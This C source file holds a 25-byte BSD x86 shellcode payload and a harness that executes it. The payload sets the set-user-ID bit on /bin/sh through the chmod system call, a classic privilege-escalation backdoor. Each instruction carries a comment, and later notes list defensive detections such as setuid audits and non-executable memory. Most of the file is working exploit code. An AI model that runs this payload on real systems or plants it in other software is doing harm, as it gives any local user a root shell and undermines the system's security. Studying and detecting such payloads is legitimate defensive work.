/* 25 bytes chmod 4755 /bin/sh shellcode - BSD-x86
 * - by bighawk (bighawk@warfare.com)
 *
 * Tested on: NetBSD-1.5, FreeBSD-4.3, OpenBSD-2.9-current
 *
 * Thanks to fi for the idea :)
 */

/*
 * Raw 32-bit x86 machine code for the BSD int 80h system-call interface.
 * Per the disassembly below it issues chmod("//bin/sh", 04755), i.e. it turns
 * on the set-user-ID bit of the system shell.
 *
 * Reviewer notes:
 *  - The 25 bytes contain no 0x00, so strlen() on this array reports the
 *    full payload length.
 *  - Entry-state assumptions (not established by the bytes themselves):
 *    cdq only zeroes edx when the sign bit of eax is clear, and mov al
 *    only writes the low byte of eax, so the upper bits of eax are presumed
 *    to be zero already.
 *  - There is no instruction after int 80h; nothing here returns to a caller.
 *  - Defensive relevance: the observable effect is a mode change on /bin/sh.
 *    File-integrity monitoring of shell binaries, periodic audits for
 *    unexpected set-user-ID files, and syscall auditing of chmod on system
 *    paths all surface it. Non-executable data pages (W^X) stop this array
 *    from being run in place.
 */
char code[] =

   "\x99"			// cdq                          ; edx = sign-extension of eax (0 if eax >= 0)
   "\x52"			// push   edx                   ; NUL terminator for the path string
   "\x68\x6e\x2f\x73\x68"	// push   dword 68732f6eh       ; "n/sh" (bytes in memory order)
   "\x68\x2f\x2f\x62\x69"       // push   dword 69622f2fh       ; "//bi" -> stack now holds "//bin/sh\0"
   "\x89\xe3"			// mov    ebx, esp              ; ebx = pointer to the path string
   "\x66\xba\xed\x09"		// mov    dx, 9edh              ; 0x09ed == octal 4755 (set-user-ID + rwxr-xr-x)
   "\x52"			// push   edx                   ; 2nd argument: mode
   "\x53"			// push   ebx                   ; 1st argument: path
   "\x53"			// push   ebx                   ; filler word; BSD syscalls expect a return-address slot above the args
   "\xb0\x0f"			// mov    al, 0fh               ; SYS_chmod (15)
   "\xcd\x80";			// int    80h                   ; enter the kernel
 
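/*
 * Test harness for the byte array above: prints the payload length, then
 * transfers control into code[].
 *
 * Side effect when the call succeeds: the mode of /bin/sh on the machine
 * running this program is changed (see the disassembly on code[]).
 *
 * code[] is an ordinary writable data object. On systems that enforce
 * non-executable data pages the indirect call faults instead of running the
 * bytes, which is the mitigation working as intended.
 *
 * The byte sequence holds no return instruction, so control is not expected
 * to come back from a(); the final return only satisfies the declared type.
 */
int main(void) {
  /* Converting an object pointer to a function pointer is not strictly
   * conforming C, but it is the purpose of this harness. */
  void (*a)(void) = (void (*)(void))code;

  /* strlen() yields size_t; cast so the argument matches the %d conversion.
   * The payload is 25 bytes, so the narrowing is harmless. */
  printf("size: %d bytes\n", (int)strlen(code));

  a();
  return 0;
}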
